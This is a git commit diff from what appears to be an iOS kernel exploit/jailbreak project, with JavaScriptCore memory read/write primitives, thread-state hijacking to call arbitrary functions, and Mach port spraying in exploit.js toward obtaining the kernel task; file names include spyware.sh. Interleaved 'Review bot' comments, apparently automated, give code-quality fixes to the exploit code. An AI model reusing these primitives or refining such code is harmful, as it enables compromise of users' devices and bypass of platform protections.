authorspv <aquaticvegetable@gmail.com>2022-04-24 21:30:15 -0400
committerspv <aquaticvegetable@gmail.com>2022-04-24 21:30:15 -0400
commit7de438565f03123d37f737d2cd905579e90bc21e (patch)
tree2459045c6f8035aac6340361170142a144c0274f
parent5f9294a0e7aac5b9e105ccee737e42fc5c4cff63 (diff)
yeet
-rwxr-xr-x[-rw-r--r--]build.sh0
-rwxr-xr-x[-rw-r--r--]build_native.sh0
-rwxr-xr-x[-rw-r--r--]exploit.conf0
-rwxr-xr-x[-rw-r--r--]install.sh0
-rwxr-xr-x[-rw-r--r--]install_native.sh0
-rwxr-xr-x[-rw-r--r--]launch.json10
-rwxr-xr-x[-rw-r--r--]old.js138
-rwxr-xr-x[-rw-r--r--]spyware.sh0
-rwxr-xr-x[-rw-r--r--]src/gen/common.h0
-rwxr-xr-x[-rw-r--r--]src/gen/ip_tools.c0
-rwxr-xr-x[-rw-r--r--]src/gen/ip_tools.h0
-rwxr-xr-x[-rw-r--r--]src/gen/patchfinder.h0
-rw-r--r--src/gen/shit.c62
-rw-r--r--src/gen/shit.h10
-rwxr-xr-x[-rw-r--r--]src/gen/stage0_primitives.c0
-rwxr-xr-x[-rw-r--r--]src/gen/stage0_primitives.h0
-rwxr-xr-x[-rw-r--r--]src/gen/stage1_primitives.c0
-rwxr-xr-x[-rw-r--r--]src/gen/stage1_primitives.h0
-rwxr-xr-x[-rw-r--r--]src/js/kexp/exploit.js79
-rwxr-xr-x[-rw-r--r--]src/js/lib/myutils.js6
-rw-r--r--src/js/main.js13
-rw-r--r--src/js/primitives/call.js25
-rw-r--r--src/js/primitives/mem.js15
-rwxr-xr-x[-rw-r--r--]tools/backup.c150
-rwxr-xr-x[-rw-r--r--]tools/build.sh0
-rwxr-xr-x[-rw-r--r--]tools/build_native.sh0
-rwxr-xr-x[-rw-r--r--]tools/ent.xml0
-rwxr-xr-x[-rw-r--r--]tools/fuck_aslr.c0
-rwxr-xr-x[-rw-r--r--]tools/fuck_ptr.c0
-rwxr-xr-x[-rw-r--r--]tools/jit_all_the_things.c0
-rwxr-xr-x[-rw-r--r--]tools/shit.c124
-rwxr-xr-x[-rw-r--r--]tools/test.c0
-rwxr-xr-x[-rw-r--r--]tools/testlol.c198
-rwxr-xr-x[-rw-r--r--]tools/thread_shit.c0
34 files changed, 454 insertions, 376 deletions
diff --git a/build.sh b/build.sh
index c8e28bf..c8e28bf 100644..100755
--- a/build.sh
+++ b/build.sh
diff --git a/build_native.sh b/build_native.sh
index a349643..a349643 100644..100755
--- a/build_native.sh
+++ b/build_native.sh
diff --git a/exploit.conf b/exploit.conf
index 8bf3bf1..8bf3bf1 100644..100755
--- a/exploit.conf
+++ b/exploit.conf
diff --git a/install.sh b/install.sh
index 3dcfb9c..3dcfb9c 100644..100755
--- a/install.sh
+++ b/install.sh
diff --git a/install_native.sh b/install_native.sh
index 325515a..325515a 100644..100755
--- a/install_native.sh
+++ b/install_native.sh
diff --git a/launch.json b/launch.json
index c2fecf3..1a7df09 100644..100755
--- a/launch.json
+++ b/launch.json
@@ -1,6 +1,6 @@
-{
- "name": "Launch",
- "type": "lldb",
- "request": "launch",
- "program": "${workspaceFolder}/tools/bin/thread_shit"
+{
+ "name": "Launch",
+ "type": "lldb",
+ "request": "launch",
+ "program": "${workspaceFolder}/tools/bin/thread_shit"
} \ No newline at end of file
diff --git a/old.js b/old.js
index 2dd0509..ce19c94 100644..100755
--- a/old.js
+++ b/old.js
@@ -1,70 +1,70 @@
-var dyld_shc_slide = get_dyld_shc_slide();
-
- printf("still alive0\n");
- write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
- printf("still alive1\n");
- write_u32(stack_shit + 0x0, 0x42069);
- printf("still alive2\n");
- write_u32(stack_shit + 0x1, 0x69420);
- printf("still alive3\n");
- write_u32(stack_shit + 0x2, 0x13371337);
- printf("still alive4\n");
- write_u32(stack_shit + 0x3, 0x6969);
- printf("still alive5\n");
-
- printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
- calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
- printf("%x\n", read_u32(threadptr));
- thread = read_u32(threadptr);
- calls4arg("usleep", 100000, 0, 0, 0);
- printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
-// call4arg(0x41414141, 0, 0, 0, 0);
- printf("still alive6\n");
- write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
-// write_u32(th, 0xa03);
- printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]);
-
- var info = 0x134004;
- var whatever = 0x134000;
-
- /*
- var lol = new Uint8Array(0x100);
-
- for (i = 0; i < 0x10000; i++) {
- write_buf(info, lol, 0x100);
- write_u32(whatever, 0x100)
-// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0));
- calls4arg("thread_info", i, 3, info, whatever);
-// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
- if (read_u32(info) != 0) {
-// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
- printf("hit: %x\n", i);
- } else if (i % 0x10 == 0) {
- printf("%x\n", i);
- }
- }*/
-
- printf("still alive7\n");
- write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n"));
- printf("still alive8\n");
- write_u32(thread_state + (1 << 2), 0x1337);
- printf("still alive9\n");
- write_u32(thread_state + (2 << 2), 0x420);
- printf("still alive10\n");
- write_u32(thread_state + (3 << 2), 0x69);
- printf("still alive11\n");
- write_u32(thread_state + (13 << 2), stack_shit);
- printf("still alive12\n");
- write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
- printf("still alive13\n");
- write_u32(thread_state + (15 << 2), sym_cache["printf"]);
- printf("still alive14\n");
- write_u32(thread_state + (16 << 2), 0x40000020);
-
- printf("still alive15\n");
- printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT));
- printf("still alive16\n");
- printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0));
- printf("still alive17\n");
-
+var dyld_shc_slide = get_dyld_shc_slide();
+
+ printf("still alive0\n");
+ write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+ printf("still alive1\n");
+ write_u32(stack_shit + 0x0, 0x42069);
+ printf("still alive2\n");
+ write_u32(stack_shit + 0x1, 0x69420);
+ printf("still alive3\n");
+ write_u32(stack_shit + 0x2, 0x13371337);
+ printf("still alive4\n");
+ write_u32(stack_shit + 0x3, 0x6969);
+ printf("still alive5\n");
+
+ printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+ calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+ printf("%x\n", read_u32(threadptr));
+ thread = read_u32(threadptr);
+ calls4arg("usleep", 100000, 0, 0, 0);
+ printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+// call4arg(0x41414141, 0, 0, 0, 0);
+ printf("still alive6\n");
+ write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+// write_u32(th, 0xa03);
+ printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]);
+
+ var info = 0x134004;
+ var whatever = 0x134000;
+
+ /*
+ var lol = new Uint8Array(0x100);
+
+ for (i = 0; i < 0x10000; i++) {
+ write_buf(info, lol, 0x100);
+ write_u32(whatever, 0x100)
+// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0));
+ calls4arg("thread_info", i, 3, info, whatever);
+// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+ if (read_u32(info) != 0) {
+// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+ printf("hit: %x\n", i);
+ } else if (i % 0x10 == 0) {
+ printf("%x\n", i);
+ }
+ }*/
+
+ printf("still alive7\n");
+ write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n"));
+ printf("still alive8\n");
+ write_u32(thread_state + (1 << 2), 0x1337);
+ printf("still alive9\n");
+ write_u32(thread_state + (2 << 2), 0x420);
+ printf("still alive10\n");
+ write_u32(thread_state + (3 << 2), 0x69);
+ printf("still alive11\n");
+ write_u32(thread_state + (13 << 2), stack_shit);
+ printf("still alive12\n");
+ write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+ printf("still alive13\n");
+ write_u32(thread_state + (15 << 2), sym_cache["printf"]);
+ printf("still alive14\n");
+ write_u32(thread_state + (16 << 2), 0x40000020);
+
+ printf("still alive15\n");
+ printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT));
+ printf("still alive16\n");
+ printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0));
+ printf("still alive17\n");
+
calls4arg("sleep", 10, 0, 0, 0); \ No newline at end of file
diff --git a/spyware.sh b/spyware.sh
index dac5939..dac5939 100644..100755
--- a/spyware.sh
+++ b/spyware.sh
diff --git a/src/gen/common.h b/src/gen/common.h
index 9550400..9550400 100644..100755
--- a/src/gen/common.h
+++ b/src/gen/common.h
diff --git a/src/gen/ip_tools.c b/src/gen/ip_tools.c
index 6e36b64..6e36b64 100644..100755
--- a/src/gen/ip_tools.c
+++ b/src/gen/ip_tools.c
diff --git a/src/gen/ip_tools.h b/src/gen/ip_tools.h
index a011094..a011094 100644..100755
--- a/src/gen/ip_tools.h
+++ b/src/gen/ip_tools.h
diff --git a/src/gen/patchfinder.h b/src/gen/patchfinder.h
index 21af7e3..21af7e3 100644..100755
--- a/src/gen/patchfinder.h
+++ b/src/gen/patchfinder.h
diff --git a/src/gen/shit.c b/src/gen/shit.c
index 6e6c5c5..ef354d4 100644
--- a/src/gen/shit.c
+++ b/src/gen/shit.c
@@ -1,32 +1,32 @@
-#include <stdarg.h>
-#include "common.h"
-#include <stdio.h>
-#include "shit.h"
-
-extern FILE* fp;
-
-int _asprintf(char **strp, const char *fmt, ...) {
- va_list ap;
- char* tmp = NULL;
-
- *strp = "";
-
- /*
- * shit
- */
-
- va_start(ap, fmt);
- vfprintf(fp, fmt, ap);
- va_end(ap);
-
-#if 0
- strcpy(fuck_memory_leaks, tmp);
-
- if (strp)
- *strp = fuck_memory_leaks;
-
- free(tmp);
-#endif
-
- return 0;
+#include <stdarg.h>
+#include "common.h"
+#include <stdio.h>
+#include "shit.h"
+
+extern FILE* fp;
+
+int _asprintf(char **strp, const char *fmt, ...) {
+ va_list ap;
+ char* tmp = NULL;
+
+ *strp = "";
+
+ /*
+ * shit
+ */
+
+ va_start(ap, fmt);
+ vfprintf(fp, fmt, ap);
+ va_end(ap);
+
+#if 0
+ strcpy(fuck_memory_leaks, tmp);
+
+ if (strp)
+ *strp = fuck_memory_leaks;
+
+ free(tmp);
+#endif
+
+ return 0;
} \ No newline at end of file
diff --git a/src/gen/shit.h b/src/gen/shit.h
index aaa4b7f..d97a995 100644
--- a/src/gen/shit.h
+++ b/src/gen/shit.h
@@ -1,6 +1,6 @@
-#ifndef SHIT_H
-#define SHIT_H
-
-int _asprintf(char **strp, const char *fmt, ...);
-
+#ifndef SHIT_H
+#define SHIT_H
+
+int _asprintf(char **strp, const char *fmt, ...);
+
#endif \ No newline at end of file
diff --git a/src/gen/stage0_primitives.c b/src/gen/stage0_primitives.c
index b54cb1a..b54cb1a 100644..100755
--- a/src/gen/stage0_primitives.c
+++ b/src/gen/stage0_primitives.c
diff --git a/src/gen/stage0_primitives.h b/src/gen/stage0_primitives.h
index a9a71eb..a9a71eb 100644..100755
--- a/src/gen/stage0_primitives.h
+++ b/src/gen/stage0_primitives.h
diff --git a/src/gen/stage1_primitives.c b/src/gen/stage1_primitives.c
index ffe7b53..ffe7b53 100644..100755
--- a/src/gen/stage1_primitives.c
+++ b/src/gen/stage1_primitives.c
diff --git a/src/gen/stage1_primitives.h b/src/gen/stage1_primitives.h
index d6b9c33..d6b9c33 100644..100755
--- a/src/gen/stage1_primitives.h
+++ b/src/gen/stage1_primitives.h
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
var req_init_port_set_address = 0x0
var req_init_port_set_count = 0x4
+var task_self = 0;
var kslide = 0;
var fakeportData = 0;
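Review bot: `task_self` is declared here with a placeholder 0 but is only assigned in get_kernel_task (`task_self = mach_task_self();` in the last hunk of this file), while copyinPort and spray_ports in the hunks between read it, so any call into those functions before get_kernel_task passes 0 as the task port. That ordering constraint is invisible at the declaration, so record it: `var task_self = 0; // cached mach_task_self(); populated by get_kernel_task(), which must run before copyinPort()/spray_ports()`. This note covers the copyinPort and get_kernel_task hunks as well.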
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
function copyinPort(kport, cnt) {
var err = malloc(4);
var ret = 0;
- var self = mach_task_self();
+ var self = task_self;
var service = MACH_PORT_NULL;
var client = malloc(4);
var it = malloc(4);
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports\n");
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
}
var mp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
- printf("%x\n", read_u32(mp));
- mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ var rmp = read_u32(mp);
+ mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ send_ports(rmp, read_u32(kp), 2, number_port_descs);
return mp;
}
+function fast_log2(n) {
+ var i = 0;
+ while (n >>= 1) {
+ i++;
+ }
+
+ return i;
+}
+
+function fast_array_mul(arr, n) {
+ var tmp_arr = arr;
+ var done = 0;
+ for (var i = 0; i < fast_log2(n) + 2; i++) {
+ tmp_arr = tmp_arr.concat(tmp_arr);
+ done = (1 << i);
+ }
+
+ return tmp_arr;
+}
+
function send_ports(target, payload, num, number_port_descs) {
var init_port_set = malloc(num * 4);
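Review bot: In fast_array_mul the local `done` is written on every iteration and never read, and `fast_log2(n)` is loop-invariant yet re-evaluated in the loop condition; hoist it as `var rounds = fast_log2(n) + 2;`, loop to `rounds`, and drop `done`. The name also overstates the result: the array is doubled `fast_log2(n) + 2` times, so the caller gets `arr` repeated 2^(floor(log2 n)+2) times — more than 2n and up to 4n copies, never exactly n — and a header comment such as `// returns arr repeated 2^(fast_log2(n)+2) times (between 2n and 4n copies), not n times` would keep callers from sizing buffers by n. fast_log2 reassigns its parameter with `n >>= 1`, which is harmless for a number but clearer with a local copy. send_ports begins on the last line of this hunk and continues outside it.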
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc));
+ var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+ var new_buf_ = new Array();
+ var tmp = u32_to_u8x4(init_port_set);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ tmp = u32_to_u8x4(num);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ new_buf_.push(0);
+ new_buf_.push(0);
+ new_buf_.push(19);
+ new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+ var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+ fast_write_buf(buf + req_init_port_set, new_buf);
+
+ /*
for (var i = 0; i < number_port_descs; i++) {
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }
+ }*/
write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
write_u32(buf + req_head_msgh_request_port, target);
write_u32(buf + req_head_msgh_reply_port, 0);
write_u32(buf + req_head_msgh_id, 1337);
- return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+ free(buf);
+
+ printf("%d %s\n", ret, mach_error_string(ret));
+
+ return ret;
}
function get_kernel_task() {
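Review bot: The replaced descriptor loop is kept as a `/* … */` block instead of being deleted; commented-out code should go, the old revision already preserves it. The twelve `push` calls on `new Array()` hand-assemble one 12-byte descriptor template; if `u32_to_u8x4` returns a plain array, a single literal `var descr = [].concat(u32_to_u8x4(init_port_set), u32_to_u8x4(num), [0, 0, 19, MACH_MSG_OOL_PORTS_DESCRIPTOR]);` says the same thing, and the bare `19` deserves a named constant like the other Mach values in this file. The `* 8` added to `malloc(0x1c + (number_port_descs * 0xc * 8))` is unexplained — presumably it covers the power-of-two blow-up of fast_array_mul rather than the `0x1c + (number_port_descs * 0xc)` size actually passed to mach_msg — and needs a comment saying which length it is sized to. send_ports begins in the previous hunk, outside this one.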
@@ -229,11 +278,13 @@ function get_kernel_task() {
sanity_port = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
- mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+ task_self = mach_task_self();
+
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+ mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
limits = malloc(4);
write_u32(limits, 1000);
- mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+ mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
printf("starting exploit\n");
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 51fc055..325c490 100644..100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended");
var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
var IOIteratorNext = scall_wrapper("IOIteratorNext");
var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
-var mach_msg = scall_wrapper("mach_msg"); \ No newline at end of file
+var mach_msg = scall_wrapper("mach_msg");
+var mmap = scall_wrapper("mmap");
+var free = scall_wrapper("free");
+var mlock = scall_wrapper("mlock");
+var mprotect = scall_wrapper("mprotect"); \ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index 4d978ef..ee0a627 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11;
var ARM_THREAD_STATE = 0x1;
var LOG_SYSLOG = 0x28;
+var PROT_READ = 0x1;
+var PROT_WRITE = 0x2;
+var PROT_EXEC = 0x4;
+
+var MAP_PRIVATE = 0x2;
+var MAP_ANON = 0x1000;
+
try {
puts("we out here in jsc");
} catch (e) {
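Review bot: The new PROT_*/MAP_* constants carry no comment saying which ABI they encode; `MAP_ANON = 0x1000` is the Darwin value and differs on other platforms, so a reader reusing this file elsewhere would silently pick up the wrong flags. Add `// mmap() protection/flag values for the Darwin ABI; MAP_ANON in particular is not portable` above the group. Nothing visible in this hunk uses them, so that comment is the only place their origin would be recorded.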
@@ -22,10 +29,6 @@ try {
puts = function (){};
}
-function csbypass() {
-
-}
-
function main() {
/*
* get slide and calculate slid base
@@ -45,8 +48,6 @@ function main() {
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-// csbypass();
-
printf("slide=0x%x\n", slide);
printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 97a47b6..e382470 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) {
return call4arg(addy, r0, r1, r2, r3);
}
+var rth = 0;
+
function callnarg() {
if (arguments.length < 1) {
return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
@@ -153,8 +155,15 @@ function callnarg() {
calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
thread = read_u32(threadptr);
write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+ rth = read_u32(th);
+ }
+
+ if (rth === 0) {
+ rth = read_u32(th);
}
+// calls4arg("thread_suspend", rth, 0, 0, 0);
+
/*
* write first 4 to r0-r3, rest to stack
*/
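Review bot: `rth = read_u32(th);` at the end of the thread-creation block is immediately followed by `if (rth === 0) { rth = read_u32(th); }`, which repeats the same read whenever the first one produced 0, so the first assignment adds nothing and the pair reads as two competing cache mechanisms. Keep only the guard, and delete the commented-out `// calls4arg("thread_suspend", rth, 0, 0, 0);` instead of leaving dead code; the same `rth` swap appears in the next two hunks, which need no further change. callnarg begins and ends outside this hunk.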
@@ -198,12 +207,8 @@ function callnarg() {
/*
* set the state
*/
- calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
-
- /*
- * probably un-necessary now, keeping in just in case for now
- */
- calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+ calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+ calls4arg("thread_resume", rth, 0, 0, 0);
/*
* spin wait for return
@@ -212,15 +217,15 @@ function callnarg() {
/*
* reset, it's used as input for thread_state size
*/
- write_u32(count, 0x100);
- calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
+ write_u32(count, 17);
+ calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
/*
* if the pc is in (resolver, resolver + 8), suspend the thread
* (to not spin endlessly), read r0 and return
*/
if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
- calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
+ calls4arg("thread_suspend", rth, 0, 0, 0);
return read_u32(thread_state);
}
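Review bot: `write_u32(count, 17);` replaces the previous `0x100` with a bare literal, but 17 is exactly ARM_THREAD_STATE_COUNT (declared as 0x11 in main.js and already used in this function's thread_set_state call), so write `write_u32(count, ARM_THREAD_STATE_COUNT);` to keep the in/out count and the set-state count from drifting apart. The comment above it, `reset, it's used as input for thread_state size`, should also say the value is a count of state words rather than a byte size, since the change from 0x100 to 17 suggests the old value was treated as bytes. callnarg begins and ends outside this hunk.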
@@ -262,7 +267,7 @@ function scall() {
args_to_pass.push(sptr(arguments[i]));
} else {
args_to_pass.push(arguments[i]);
- if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+ if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) {
force_callnarg = true;
}
}
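Review bot: The condition on the changed line has an operator-precedence defect that the commit keeps: in JavaScript `==` binds tighter than `&`, so `arguments[i] & 0xffff0000 == 0xffff0000` parses as `arguments[i] & (0xffff0000 == 0xffff0000)`, i.e. `arguments[i] & 1`, and the second clause collapses to `arguments[i] & 0`. The test therefore fires on any odd argument in position 1 or 3, not on the high-address pattern the constants suggest. Parenthesise the mask and account for `&` producing a signed 32-bit result, e.g. `var hi = (arguments[i] & 0xffff0000) >>> 0;` followed by `if ((hi === 0xffff0000 || hi === 0xfffe0000) && (i == 1 || i == 3)) {`. scall begins and ends outside this hunk.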
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 85cd132..ff12fdd 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) {
return buf;
}
+function fast_write_buf(addy, buf) {
+ var upper_i = Math.floor(buf.length / 0x100);
+
+ for (var i = 0; i < upper_i; i++) {
+ u8x4 = u32_to_u8x4(addy + (i * 0x100));
+ parent[VECTOR_OFFSET + 0x0] = u8x4[0];
+ parent[VECTOR_OFFSET + 0x1] = u8x4[1];
+ parent[VECTOR_OFFSET + 0x2] = u8x4[2];
+ parent[VECTOR_OFFSET + 0x3] = u8x4[3];
+ for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) {
+ child[j % 0x100] = buf[j];
+ }
+ }
+}
+
/*
* write uint8_t
*/
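Review bot: `u8x4 = u32_to_u8x4(addy + (i * 0x100));` in fast_write_buf assigns an undeclared name and so creates an implicit global (a ReferenceError under strict mode); make it `var u8x4 = u32_to_u8x4(addy + (i * 0x100));`. `upper_i = Math.floor(buf.length / 0x100)` means only whole 0x100-byte chunks are written and a trailing partial chunk is silently dropped — the `j < buf.length` guard in the inner loop can never bind — so either document that `buf.length` must be a multiple of 0x100 or round up with `Math.ceil`, which is what that guard was written for. `parent`, `child` and `VECTOR_OFFSET` are defined outside this hunk; a header such as `// write the byte array buf to addy in 0x100-byte chunks through parent/child; the chunk address is stored into parent[VECTOR_OFFSET..+3] once per chunk` would tell a reader what state the loop relies on.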
diff --git a/tools/backup.c b/tools/backup.c
index 1ed9921..c1472a3 100644..100755
--- a/tools/backup.c
+++ b/tools/backup.c
@@ -1,76 +1,76 @@
-#include <mach/mach.h>
-#include <sys/mman.h>
-#include <pthread.h>
-#include <stdio.h>
-#include <dlfcn.h>
-
-void lol(void) {
- puts("hello?");
-// *(uint32_t*)0x41424344 = 0;
-}
-
-void* lol2(void* arg) {
- while (1) ;;
-}
-
-int main(int argc, char* argv[]) {
- kern_return_t kr;
- thread_t th;
- mach_port_name_t mytask, mythread;
- printf("Hello, world!\n");
- mytask = mach_task_self();
- mythread = mach_thread_self();
-
- mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0);
-
- char* test = malloc(0x100);
- strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n");
-
- pthread_t thread;
- pthread_create(&thread, NULL, lol2, NULL);
-
- puts("test");
-
-// thread_create(mytask, &th);
- th = pthread_mach_thread_np(thread);
- printf("%x\n", mytask);
- arm_thread_state_t state;
- mach_msg_type_number_t count;
- kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count);
-
- uint32_t* stack_above = 0x2001000;
- stack_above[0] = 0x42069;
- stack_above[1] = 0x69420;
- stack_above[3] = 0x13371337;
- stack_above[4] = 0x6969;
-
-// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts"));
-
-// exit(42);
-
-// *(uint32_t*)0x41414141 = 0;
-
-// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t));
-
- for (int i = 0; i < 13; i++) {
- fprintf(stderr, "r%d=%x\n", i, state.__r[i]);
- }
-
- *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000;
-
- state.__r[0] = test;
- state.__r[1] = 0x1337;
- state.__r[2] = 0x420;
- state.__r[3] = 0x69;
- state.__sp = (uint32_t)stack_above;
- state.__lr = 0x23d751fc + 0x1b4c000;
- state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1;
- state.__cpsr = 0x40000020;
- kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
- kr = thread_resume(th);
-// thread_call_enter((thread_call_func_t)&lol);
-
- sleep(1);
-
- return 0;
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <dlfcn.h>
+
+void lol(void) {
+ puts("hello?");
+// *(uint32_t*)0x41424344 = 0;
+}
+
+void* lol2(void* arg) {
+ while (1) ;;
+}
+
+int main(int argc, char* argv[]) {
+ kern_return_t kr;
+ thread_t th;
+ mach_port_name_t mytask, mythread;
+ printf("Hello, world!\n");
+ mytask = mach_task_self();
+ mythread = mach_thread_self();
+
